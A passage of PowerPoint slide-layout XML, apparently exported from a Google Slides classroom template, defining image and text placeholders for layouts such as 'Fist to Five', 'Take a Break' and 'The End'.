        <p:nvPicPr>
          <p:cNvPr id="946" name="Google Shape;946;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709928"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="947" name="Google Shape;947;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2129247"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="948" name="Google Shape;948;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2577303"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="949" name="Google Shape;949;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2999232"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="950" name="Google Shape;950;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3438144"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="951" name="Google Shape;951;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3877056"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="952" name="Google Shape;952;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552"/>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Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="953" name="Shape 953"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="954" name="Google Shape;954;p47"/>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55" name="Google Shape;955;p47"/>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956" name="Google Shape;956;p47"/>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957" name="Google Shape;957;p4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958" name="Google Shape;958;p47"/>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959" name="Google Shape;959;p47"/>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0" name="Google Shape;960;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003925" y="3873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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-24600" y="38730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2" name="Google Shape;962;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003800" y="43111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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="43112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4" name="Google Shape;964;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003875" y="299662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47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-150" y="299675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6" name="Google Shape;966;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003750" y="34347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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="343487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68" name="Google Shape;968;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003900" y="213525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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-24725" y="2135375"/>
            <a:ext cx="9144000" cy="3657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0" name="Google Shape;970;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003775" y="25733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47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="25735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2" name="Google Shape;972;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003775" y="1258875"/>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47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="9" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1259000"/>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74" name="Google Shape;974;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003775" y="1697000"/>
            <a:ext cx="7866300" cy="37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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="13" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1697125"/>
            <a:ext cx="9144000" cy="377100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="1243575" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="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76" name="Google Shape;976;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="977" name="Google Shape;977;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709928"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="978" name="Google Shape;978;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2129247"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="979" name="Google Shape;979;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2577303"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="980" name="Google Shape;980;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2999232"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="981" name="Google Shape;981;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3438144"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="982" name="Google Shape;982;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3877056"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="983" name="Google Shape;983;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4314663"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:extLst>
    <p:ext uri="{DCECCB84-F9BA-43D5-87BE-67443E8EF086}">
      <p15:sldGuideLst>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Fist to Five">
  <p:cSld name="CUSTOM_2_3_1_1_3_1_1_2_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="984" name="Shape 984"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="985" name="Google Shape;985;p48"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="59" l="0" r="0" t="59"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="274881"/>
            <a:ext cx="8595360" cy="4593743"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="986" name="Google Shape;986;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="3307075"/>
            <a:ext cx="8595300" cy="15615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87" name="Google Shape;987;p4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88" name="Google Shape;988;p48"/>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989" name="Google Shape;989;p48"/>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990" name="Google Shape;990;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="202525" y="2754341"/>
            <a:ext cx="8595300" cy="371100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">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991" name="Google Shape;991;p48"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2305500" y="3307075"/>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Review">
  <p:cSld name="CUSTOM_17_2_1_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="992" name="Shape 992"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="993" name="Google Shape;993;p49"/>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994" name="Google Shape;994;p4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995" name="Google Shape;995;p49"/>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6" name="Google Shape;996;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="2880775"/>
            <a:ext cx="85953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997" name="Google Shape;997;p49"/>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Take a Break 1">
  <p:cSld name="CUSTOM">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="998" name="Shape 998"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="999" name="Google Shape;99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0" name="Google Shape;1000;p50"/>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47" name="Shape 47"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48" name="Google Shape;48;p6"/>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49" name="Google Shape;49;p6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325"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solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>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0" name="Google Shape;50;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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="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6"/>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Take a Break 2">
  <p:cSld name="CUSTOM_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1001" name="Shape 1001"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1002" name="Google Shape;1002;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03" name="Google Shape;1003;p51"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143971" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1004" name="Google Shape;1004;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-25" y="411400"/>
            <a:ext cx="9144000" cy="7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05" name="Google Shape;1005;p51"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2305500" y="1468500"/>
            <a:ext cx="4533000" cy="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7. The End">
  <p:cSld name="CUSTOM_7">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1006" name="Shape 1006"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1007" name="Google Shape;1007;p52"/>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1008" name="Google Shape;1008;p52"/>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09" name="Google Shape;1009;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="7971900" cy="226800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="274300" spcFirstLastPara="1" rIns="0" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1010" name="Google Shape;1010;p52"/>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_9">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1011" name="Shape 1011"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1012" name="Google Shape;1012;p53"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1013" name="Google Shape;1013;p53"/>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ransition Slide">
  <p:cSld name="CUSTOM_17_2_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="53" name="Shape 53"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="Google Shape;54;p7"/>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55" name="Google Shape;55;p7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="237100" y="2088475"/>
            <a:ext cx="8595300" cy="7923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3600">
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>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56" name="Google Shape;56;p7"/>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7"/>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Text Only">
  <p:cSld name="CUSTOM_2_7_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="58" name="Shape 58"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Google Shape;59;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="0"/>
            <a:ext cx="9168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0" name="Google Shape;60;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="91440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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="61" name="Google Shape;61;p8"/>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62" name="Google Shape;62;p8"/>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63" name="Google Shape;63;p8"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Google Shape;64;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2"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5" name="Google Shape;65;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="35817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ext with Sidebar">
  <p:cSld name="CUSTOM_2_4_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="66" name="Shape 66"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67" name="Google Shape;67;p9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="119" l="0" r="0" t="119"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7048950" y="910275"/>
            <a:ext cx="1828800" cy="3784798"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Google Shape;68;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="6674700" cy="364800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="91425">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9" name="Google Shape;69;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1245800"/>
            <a:ext cx="6699600" cy="3897600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-317500" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
